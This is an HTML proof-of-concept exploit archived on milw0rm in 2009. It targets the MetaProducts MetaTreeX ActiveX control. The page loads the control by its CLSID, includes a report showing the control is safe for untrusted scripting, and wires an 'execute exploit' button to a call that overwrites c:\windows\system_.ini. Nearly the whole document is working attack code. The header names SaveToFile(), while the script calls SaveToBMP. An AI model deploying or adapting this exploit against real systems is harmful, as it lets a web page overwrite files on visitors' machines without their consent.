38 lines
No EOL
746 B
HTML
38 lines
No EOL
746 B
HTML
<HTML>
|
|
<BODY>
|
|
|
|
<b>
|
|
Author : Houssamix <br/> <br/> <br/>
|
|
|
|
MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit <br/>
|
|
|
|
Note : SaveToFile() is vuln to <br/>
|
|
|
|
<b/>
|
|
|
|
|
|
<object id=hsmx classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object>
|
|
|
|
<SCRIPT>
|
|
/*
|
|
|
|
Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26}
|
|
RegKey Safe for Script: Faux
|
|
RegKey Safe for Init: Faux
|
|
Implements IObjectSafety: Vrai
|
|
IDisp Safe: Safe for untrusted: caller,data
|
|
IPStorage Safe: Safe for untrusted: caller,data
|
|
|
|
*/
|
|
function hehe()
|
|
{
|
|
File = "c:\\windows\\system_.ini"
|
|
hsmx.SaveToBMP(File)
|
|
}
|
|
|
|
</SCRIPT>
|
|
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
|
|
</body>
|
|
</HTML>
|
|
|
|
# milw0rm.com [2009-01-16] |